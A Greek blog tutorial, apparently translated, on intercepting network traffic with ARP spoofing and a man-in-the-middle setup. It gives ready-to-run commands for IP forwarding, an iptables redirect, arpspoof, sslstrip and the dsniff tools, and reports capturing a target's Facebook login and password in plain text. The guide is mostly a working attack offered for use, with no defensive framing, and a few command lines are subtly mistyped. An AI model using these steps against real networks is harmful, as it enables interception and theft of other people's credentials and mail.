Σύλληψη πακέτων HTTPS/FTP με ARP Spoofing και MITM

Σύμφωνα με την Wikipedia, στην κρυπτογραφία και την ασφάλεια του υπολογιστή, μια  επίθεση man-in-the-middle  (MITM) είναι μια επίθεση όπου ο εισβολέας μεταδίδει κρυφά και πιθανώς μεταβάλλει την επικοινωνία μεταξύ δύο συσκευών που πιστεύουν ότι επικοινωνούν απευθείας μεταξύ τους.

Μια επίθεση MITM επιτρέπει σε έναν κακόβουλο χρήστη να παρακολουθεί, να στέλνει και να λαμβάνει δεδομένα που προορίζονται για κάποιον άλλο ή δεν προορίζονται να σταλούν καθόλου.

Σε αυτόν τον οδηγό θα εργαστούμε στο Kali Linux καθώς και τα προεγκατεστημένα εργαλεία που θα χρησιμοποιήσουμε είναι τα arpspoof, sslstrip, dsniff, iptables κ.λ.π.

Εάν θέλετε να χρησιμοποιήσετε κάποιες άλλες διανομές Linux, τότε μπορείτε εύκολα να εγκαταστήσετε αυτά τα εργαλεία πληκτρολογώντας τις ακόλουθες εντολές:

Εντολή: sudo apt-get install aprspoof && sudo apt-get install sslstrip && sudo apt-get install dsniff

Λεπτομέρειες:

  1. Victim's Machine – Windows XP (192.168.179.147)
  2. Attacker's Machine – Kali Linux (192.168.179.146)
  3. Διεύθυνση IP δρομολογητή – Gateway (192.168.179.2)

Το πρώτο βήμα είναι να ρυθμίσουμε τον θύτη υπολογιστή μας, ώστε να επιτρέπει την προώθηση πακέτων, κάτι που θα του επιτρέπει να μιμείται τον εαυτό του ως δρομολογητή. Για να ξεγελάσεις το του θύματος να σκέφτεται ότι συνδέεται με το δρομολογητή, αλλά πραγματικά θα συνδέεται ξανά με το μηχάνημα που επιτίθεται.

Για την προώθηση πακέτων, θα πρέπει να ανοίξετε ένα τερματικό και να πληκτρολογήσετε ” echo 1> /proc/sys/net/ipv4/ip_forward“.

Αυτό θα μας επιτρέψει να προωθήσουμε την κυκλοφορία από το μηχάνημα του επιτιθέμενου στο μηχάνημα του θύματος. Μπορείτε επίσης να χρησιμοποιήσετε την παρακάτω εντολή για να ενεργοποιήσετε την προώθηση των πακέτων.

Εντολή: sysctl -w net.ipv4.ip_forward = 1

Εάν το μηχάνημά σας δεν προωθεί τα πακέτα, η σύνδεση στο Διαδίκτυο του χρήστη θα παγώσει και επομένως η επίθεση δεν θα ολοκληρωθεί.

Τώρα στο δεύτερο βήμα, πρέπει να διαμορφώσουμε τα iptables με τέτοιο τρόπο, ώστε να μπορούν να ανακατευθύνουν όλη την κίνηση από τη 80 στη θύρα 8080.

Εντολή: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Η επόμενη κίνηση είναι να βρείτε την προεπιλεγμένη πύλη του δρομολογητή, την οποία μπορείτε εύκολα να ανακαλύψετε πληκτρολογώντας “route -n” στο τερματικό σας.

Έτσι, σε αυτήν την περίπτωση, η προεπιλεγμένη είναι η “192.168.179.2“.

Για να βρείτε τη διεύθυνση IP του προορισμού σας, μπορείτε να χρησιμοποιήσετε οποιαδήποτε από τις μεθόδους κοινωνικής μηχανικής ή μπορείτε να τρέξετε την εντολή Nmap για να μάθετε όλους τους live κεντρικούς υπολογιστές στο δίκτυό σας πληκτρολογώντας “nmap -sP 192.168.179.1/24“.

Τώρα το επόμενο βήμα είναι να ρυθμίσετε το arpspoof μεταξύ του θύματος και του θύτη.

Το Arpspoof είναι ένα πρόγραμμα γραμμής εντολών, που σας επιτρέπει να παρακολουθείτε πακέτα σε ένα εναλλασσόμενο δίκτυο LAN. Είναι ένας εξαιρετικά αποτελεσματικός τρόπος για sniffing της κίνησης σε ένα switch.

Σύνταξη: arpspoof -i [Interface Name] -t [Victim's IP] -r ['s IP]

Έτσι στην περίπτωσή μας,

  • -i = eth0
  • -t = 192.168.179.147
  • -r = 192.168.179.2

Έτσι, η τελική εντολή θα είναι:

Εντολή: arpspoof -i eth0 -t 192.168.179.147 -r 192.168.179.2

Η παραπάνω διαδικασία θα παρακολουθεί τη ροή των πακέτων από το θύμα στον δρομολογητή. Τώρα για να συλλάβετε τα πακέτα HTTP, μπορείτε να χρησιμοποιήσετε το εργαλείο που είναι ένα από τα πιο δημοφιλή εργαλεία sniffing.Όμως όλοι γνωρίζετε ότι πάνω από το 70% των ιστότοπων έχουν τώρα HTTPS, οπότε για να κάνουμε sniffing σε πακέτα HTTPS, θα χρησιμοποιήσουμε το SSLSTRIP.

Το SSLStrip αναζητεί συνδέσμους HTTPS και ανακατευθύνσεις. Στη συνέχεια αντιστοιχίστε αυτά τα links ή με όμοια ή με τις άλλες ίδιες συνδέσεις HTTP ή συνδέσμους HTTPS που μοιάζουν. Για να ξεκινήσετε τη διαδικασία sslstrip, η εντολή είναι “sslstrip -l 8080“.

Όταν το μηχάνημα του θύματος επισκέπτεται έναν ιστότοπο, όλη η επισκεψιμότητα https θα προωθείται στο μηχάνημα που κάνει την επίθεση. Στην περίπτωσή μας, προσπαθούμε να αποκτήσουμε πρόσβαση στο https://facebook.com και μόλις εισάγετε τις πληροφορίες σύνδεσης και τον κωδικό πρόσβασης, ένα αρχείο sslstrip.log θα αποθηκευτεί στον αρχικό σας κατάλογο του μηχανήματος Kali Linux.

Όπως μπορείτε να δείτε, συλλάβαμε πακέτα HTTPS σε μορφή απλού κειμένου που συμπεριλαμβάνει ένα email σύνδεσης και έναν κωδικό πρόσβασης του λογαριασμού facebook του στόχου μας.

Τώρα, αν θέλετε να συλλάβετε περισσότερα δεδομένα ορισμένων άλλων πρωτοκόλλων όπως FTP, HTTP, SNMP, POP, LDAP κ.λ.π., θα χρησιμοποιήσετε το Dsniff Tool, το οποίο είναι επίσης προεγκατεστημένο στο Kali Linux.

Για να χρησιμοποιήσετε το Dsniff, ανοίξτε ένα νέο τερματικό και πληκτρολογήστε “dsniff -i eth0“.

Για να συλλάβετε μόνο τις πληροφορίες της διεύθυνσης URL, μπορείτε να χρησιμοποιήσετε την εντολή “urlsnarf -i eth0“.

Για να συλλάβετε την κυκλοφορία της αλληλογραφίας SMTP, μπορείτε να χρησιμοποιήσετε την εντολή ” mailsnarf -i eth0“.

Μόλις τελειώσετε με την επίθεσή σας, θυμηθείτε να απενεργοποιήσετε την προώθηση πακέτων στο σύστημά σας, εκτελώντας ξανά την παρακάτω εντολή σε ένα τερματικό:

Εντολή: sysctl -w net.ipv4.ip_forward = 0

iGuRu.gr The Best Technology Site in Greecefgns

κάθε δημοσίευση, άμεσα στο inbox σας

Προστεθείτε στους 2.100 εγγεγραμμένους.

Written by Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).